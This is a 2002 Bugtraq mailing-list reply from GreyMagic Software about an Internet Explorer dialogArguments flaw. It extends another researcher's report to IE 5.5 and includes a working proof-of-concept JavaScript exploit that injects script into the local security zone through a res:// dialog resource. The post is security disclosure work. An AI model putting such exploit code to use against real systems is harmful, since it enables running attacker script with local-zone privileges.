Bugtraq mailing list archives
RE: (MSIE) -"dialogArguments" (extended)
From: "GreyMagic Software" <security () greymagic com>
Date: Wed, 20 Nov 2002 10:55:17 +0200
> An IFRAME in a page opened by "openModalDialog" has the "dialogArguments" of its parent.
The method is "showModalDialog" and not "openModalDialog". It's worth noting that "showModelessDialog" is also vulnerable.
> /*note: please tell me if "MSIE SP1" allows an internet page to contain an iframe with local content*/
Normally, it doesn't. But it seems like Microsoft applied that rule to normal windows and forgot to do the same for dialogs.
> In the demo:
> (*) the "victim zone" is the local zone;
> (*) the page from the victim zone is "res://shdoclc.dll/privacypolicy.dlg"; it uses "cookieUrl" without filtering.
This vulnerability is very similar to the redirect vulnerability in dialogs presented by Thor Larholm back in March and it has the same impact. But just like Larholm's initial advisory was confined to IE 6, Liu's is confined to IE 6 as well. This is a result of using "privacypolicy.dlg" for exploitation, which was not shipped prior to version 6.

However, IE 5.5 is also vulnerable, and can be exploited by using the "analyze.dlg" resource, which we published immediately after Thor's advisory at the time. Notice that IE 5.0 is not vulnerable to this flaw at all. It seems like many of the recent IE vulnerabilities emerge from the global change made to windows (including frames and iframes) in IE 5.5.

The following proof-of-concept code will work on both (fully patched) IE 5.5 and IE 6:

/* Online demonstration at http://security.greymagic.com/misc/globalDgArg/ */
function oExploit(iSec) {
    return { rel:"stylesheet", readyState:"exploit", href:sHTML };
}
oExploit.length=1;

var sHTML="<scr\ipt defer>alert(location.href)</scr\ipt>",
    oSecurity={
        document:{
            all:{
                tags:function (sTag) {
                    return sTag=="link" ? oExploit : [];
                }
            }
        }
    };

// base.html contains <iframe src="res://shdoclc.dll/analyze.dlg"></iframe>
showModalDialog("base.html",oSecurity);
Current thread:
- (MSIE) when parent gives his son bad things ;) --"dialogArguments " again Liu Die Yu (Nov 19)
- Re: (MSIE) when parent gives his son bad things ;) --"dialogArguments " again Dave Ahmad (Nov 19)
- RE: (MSIE) -"dialogArguments" (extended) GreyMagic Software (Nov 23)